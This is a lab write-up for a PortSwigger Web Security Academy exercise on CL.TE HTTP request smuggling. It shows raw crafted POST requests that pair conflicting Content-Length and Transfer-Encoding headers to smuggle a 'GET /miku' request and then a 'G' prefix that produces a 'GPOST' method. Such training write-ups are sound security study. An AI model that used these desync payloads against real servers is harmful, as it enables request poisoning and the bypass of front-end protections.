| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | HTTP Request Smuggling — CL.TE |
| Difficulty | Practitioner |
| Objective | Cause the back-end to process a request with the method GPOST |
| Note | Switch Burp Repeater to HTTP/1 manually. Disable "Update Content-Length." |
HTTP Request Smuggling — Basic CL.TE Vulnerability¶
Intercepting the root request — already HTTP/1.1:
We switch to POST, remove unnecessary headers, and add Transfer-Encoding: chunked. Testing with a smuggled GET /miku to confirm the desync works:
POST / HTTP/1.1
Host: 0ace007d03706bf18139c000006c0022.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Transfer-Encoding: chunked
0
GET /miku HTTP/1.1
Teto: teto
404 Not Found — the back-end processed the smuggled GET /miku as a separate request. Desync confirmed.
The objective is to make the back-end see a request with the method GPOST. We smuggle a single G character as the prefix. When the next real request arrives on the connection, the back-end appends it to that G — turning G + POST / HTTP/1.1... into GPOST / HTTP/1.1.... Since GPOST isn't a valid HTTP method, the back-end returns an unrecognized method error.
POST / HTTP/1.1
Host: 0ace007d03706bf18139c000006c0022.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
0
G
Content-Length: 6 covers 0\r\n\r\nG exactly — the front-end stops there. The back-end processes chunked encoding, closes at the 0 chunk, and has G left in the buffer as the prefix for the next request.
We force the GPOST and the error will get the lab solved